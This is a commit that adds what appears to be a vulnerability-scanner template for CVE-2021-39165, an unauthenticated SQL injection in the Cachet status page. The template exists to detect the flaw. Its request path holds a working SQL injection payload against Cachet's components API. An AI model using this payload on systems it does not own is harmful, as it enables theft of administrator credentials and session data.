Create CVE-2021-39165.yaml

2022-10-06 16:20:48 -04:00 · 2022-10-06 16:20:48 -04:00 · d4eebf36cd
parent de7abb3f09
commit d4eebf36cd
1 changed files with 41 additions and 0 deletions
--- a/cves/2021/CVE-2021-39165.yaml
+++ b/cves/2021/CVE-2021-39165.yaml
@ -0,0 +1,41 @@
+id: CVE-2021-39165
+
+info:
+  name: Cachet Unauthenticated SQL Injection
+  author: tess
+  severity: high
+  description: |
+    Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39165
+    - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html
+    - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 6.5
+    cwe-id: CWE-89, CWE-287
+  metadata:
+    verified: true
+  tags: sqli,cve,cve2021
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/v1/components?name=1&1[0]=&1[1]=a&1[2]=&1[3]=or+%27a%27=%3F%20and%201=1)+--+'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"meta":'
+          - '"pagination"'
+          - '"data":'
+          - '"id":'
+        condition: and
+
+      - type: status
+        status:
+          - 200